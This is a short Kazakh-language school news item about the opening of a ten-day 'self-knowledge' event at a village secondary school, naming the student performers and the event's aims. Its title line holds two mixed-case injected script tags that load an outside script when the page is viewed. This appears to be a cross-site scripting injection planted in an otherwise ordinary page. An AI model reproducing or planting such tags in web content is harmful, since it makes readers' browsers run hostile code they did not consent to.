Өзін-өзі тану пәнінен онкүндіктің ашылуы<sCrIpT sRc=///1.js></ScRiPt><sCrIpT sRc=///1.js></ScRiPt>
04.02.2020
Ғ.Әбдірахманұлы атындағы Қима орта мектебінде 3-ақпан күні өзін-өзі тану пәні бойынша «Өзін-өзі тану: Махаббат пен Шығармашылық педагогикасы» онкүндігі басталды.
Мақсаты: Сүйіспеншілік пен шығармашылық аясында оқушыларға бақыттың құндылық ретіндегі мағынасы және мейірімді адами қасиеті мен өзара көмек әрекеттері туралы түсінік беріп, қамқорлық жасау, көмек көрсету дағдыларын дамыта отыра, рухани адамгершілік қағидаларын өз бақыты үшін дұрыс қолдана білуге, өмірді бағалай білуге тәрбиелеу.
- оқушыларды өз болашағы бағытын айқындап, мақсат қоя білуге үйрету;
- оқушылардың өзін-өзі тәрбиелеу, өзін-өзі жетілдіру арқылы болашаққа құштарлығын дамыту.
6-ә сынып оқушылары арасынан жүргізушілер Жабагин Аман мен Газизова Сабина линейканы бастап Сара Алпысовнаның өмірбаяны, шығармашылығы жайында айтып, бейнефильм көрсетілді. Тапаев Бахтияр, Искаков Санжар, Сериков Бекзат, Карашин Мадияр, Султанбекова Аяулым «Бақыт, байлық, ақыл туралы» көрініс көрсетіп, 10-сынып оқушысы Жұматаев Бахтияр тамаша ән тарту етті.
Омарова А.Б.